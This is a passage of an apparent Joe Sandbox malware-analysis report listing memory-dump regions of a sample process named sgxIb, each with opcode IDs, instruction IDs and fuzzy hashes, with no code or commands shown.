                                • Instruction Fuzzy Hash: D421E170A043945FDB559B789C501DEFFB5EF8A320F0484ABD04AEB281DA309E44CBE2
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d97c52e35aeb46ac71df9e8775ce0454daba971308599ec07dbe4a722c56fec3
                                • Instruction ID: 9a9945209ca5a13bcd49a6ec2940c0656bde3310610b2444c49a1b27a036411c
                                • Opcode Fuzzy Hash: d97c52e35aeb46ac71df9e8775ce0454daba971308599ec07dbe4a722c56fec3
                                • Instruction Fuzzy Hash: 58113C36B105284BDB58DA7CD8246AE77FAEBC8761B00C539D50AE7340EA65DC1287A1
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0f96039aee8923847e4b1074b947ae78687231d217fbbe7439ff7b98a923ab04
                                • Instruction ID: bb0c1b6ff1be5d396a1765b4bbf25fe5b5ea135f4ed8db966057b8432914006a
                                • Opcode Fuzzy Hash: 0f96039aee8923847e4b1074b947ae78687231d217fbbe7439ff7b98a923ab04
                                • Instruction Fuzzy Hash: FE01F534B041501FDB718B7CD464B6F7BE6DFC9224B14842EE509CB341DA25DD028391
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d90fdcbd4de17f395f93d099ed196e278648d79da93ccf2b4d6f3e1c78492c7
                                • Instruction ID: fb894dab3f926b971eed69b89ff6cf64c11cd3a40055cc91dd1b28c23cb19b58
                                • Opcode Fuzzy Hash: 7d90fdcbd4de17f395f93d099ed196e278648d79da93ccf2b4d6f3e1c78492c7
                                • Instruction Fuzzy Hash: 0C21E3B5D01259AFDB10CFAAD884ADEFBB4FB49210F10812AE918A7300D375A954CBE5
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 260593614d6264c6ded2ba67aed154f303fa42251dd91cb94412d578ef2bce5b
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: B411BB75504284CFCB12CF58D5C0B15BBA1FB84714F28C6AEDA494B697C33BD44ACBA2
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                • Instruction ID: e545303090e35259072e1577c480db2df85410b80c91ada64924ba657f362da1
                                • Opcode Fuzzy Hash: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                • Instruction Fuzzy Hash: EC11DD76504284CFDB12CF54D5C4B15BB62FB84724F28C6AEDA490B647C33AD40ACBA2
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 2fb332a78dfd9ef1c29f72de9f4ec9399231e1434bdb3de5717388d4cbac96dc
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: 6F11EE75504284CFCB12CF54C5C0B55FBA1FB84314F24C6AEDA094B292C33AE44ACB92
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42a6802c0a0a58fa45ce0ad00bef63544ac02a711f49dea94ffdc9abd43babbd
                                • Instruction ID: 9c972cfeae7f6aa5ece983020462f554045feaafecea0d53d260b2666ac0ff1c
                                • Opcode Fuzzy Hash: 42a6802c0a0a58fa45ce0ad00bef63544ac02a711f49dea94ffdc9abd43babbd
                                • Instruction Fuzzy Hash: 5E016D35B100241BDB6895BD9564B2FB3DBDBCA720F18C43EE60EC7344D965DD4247A1
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 724c510efe8a872ec9f028d1f90aefa431ed15d625deb7c206a3572b0c92613f
                                • Instruction ID: bd5a079f950dc206e68f210852c22530c51a9db6a0d1810a7c74ffea547c470f
                                • Opcode Fuzzy Hash: 724c510efe8a872ec9f028d1f90aefa431ed15d625deb7c206a3572b0c92613f
                                • Instruction Fuzzy Hash: BB11D0B5D01259AFCB00DF9AD884ADEFBB4FB49320F10812AE918B7340C375A954CFA5
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0894247088519ffbdd6366d34d2cfe1377366bdf65ab6abc2a3a4c4862926ba4
                                • Instruction ID: 78bae51d57a3def60717218876b34f669632f192de5928c2d4b82075730a8aea
                                • Opcode Fuzzy Hash: 0894247088519ffbdd6366d34d2cfe1377366bdf65ab6abc2a3a4c4862926ba4
                                • Instruction Fuzzy Hash: 84016935B100241BDB6895AD9564B2FA3DBEBCA720F28C83EE60EC7384D966DD024791
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c43499a0747e73e295b6aff724015a01c0ee31944cd82da71712485fbb1e479
                                • Instruction ID: 9138dc78c5182347c043c958428e848e4212de769cb145152d2e755d1f445976
                                • Opcode Fuzzy Hash: 2c43499a0747e73e295b6aff724015a01c0ee31944cd82da71712485fbb1e479
                                • Instruction Fuzzy Hash: 0C016935B100141BDB659A7DA454B2E67D6EBC9624F24883DE50ACB344EE65DD024392
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5a86700f476b5ca6be2f2571cbb8fc6c8964430cb0002284b043f0f6ecf92a2
                                • Instruction ID: 4dc50ab532e5cf76d968a48ffe36e35c00d05671eaea74b08777482d7316c5cc
                                • Opcode Fuzzy Hash: e5a86700f476b5ca6be2f2571cbb8fc6c8964430cb0002284b043f0f6ecf92a2
                                • Instruction Fuzzy Hash: 46016232B100144BDB58997D9C206AF76FAEBC8761F00813DD609E7240EE65DD1147E1
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6269486a5588d7274326bbeb6f33813e4b11659ada9d7d89ed70ceea3c99d408
                                • Instruction ID: f11e3bfaee5699f2b6e8df8d47c85d907163b08d1c0dddf8ad30a838560fd78b
                                • Opcode Fuzzy Hash: 6269486a5588d7274326bbeb6f33813e4b11659ada9d7d89ed70ceea3c99d408
                                • Instruction Fuzzy Hash: 5B014430B104185FDB64DABCE958B6A73D6EB89724F10483DE20AD7754DE29ED0287D1
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac55e5450492f97abeab560097af6a2d07ed0db15e48f428842e20d40c39369e
                                • Instruction ID: 1dd6a4d469029119eab862f5fee20f022a83d13ef900dcddd7ad375a9a8cb22a
                                • Opcode Fuzzy Hash: ac55e5450492f97abeab560097af6a2d07ed0db15e48f428842e20d40c39369e
                                • Instruction Fuzzy Hash: 6001F471B10228ABDF249A79EC80A9AB779FBC5364F00443DE905EB340DA36AC058BD0
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7690f37e920c8846273e762a2ee9a0087a646fa2da1b982a788975e4590ed30b
                                • Instruction ID: 88fa9dca792c753e4219c5dd9f089cc64b79d5b562cafd8fa4eddfd887a14d7e
                                • Opcode Fuzzy Hash: 7690f37e920c8846273e762a2ee9a0087a646fa2da1b982a788975e4590ed30b
                                • Instruction Fuzzy Hash: 99F0DC35B022009FDF64CE55EAA02AA7B69EB80260F00447EDA04EB251C739EA02CB81
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c7092622ecad3f9c3fabc46241e60713281022759c4db9a362a6c0f3186f0e3
                                • Instruction ID: 30bcbf7aae8d94e79ea05d466d142461c9eb7be5cf173c367f4511f59a26fe48
                                • Opcode Fuzzy Hash: 6c7092622ecad3f9c3fabc46241e60713281022759c4db9a362a6c0f3186f0e3
                                • Instruction Fuzzy Hash: 86E061B0D042486FDF20CB71CD0576977BCD741124F6140EDD808D7207E131CB418791
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f96acdcd08dd3df545be41cf64c8ad739afe873e9adf46ed11aa7d0e7e3f596
                                • Instruction ID: dac0998435508b35ff59c76e63d84354fc30ce757b349d17e3cebefab33c234d
                                • Opcode Fuzzy Hash: 5f96acdcd08dd3df545be41cf64c8ad739afe873e9adf46ed11aa7d0e7e3f596
                                • Instruction Fuzzy Hash: 3BF0B730A54129EBDB14DB94E8A8BAEBBB2FF48714F208519E402A7294CB701D41CB80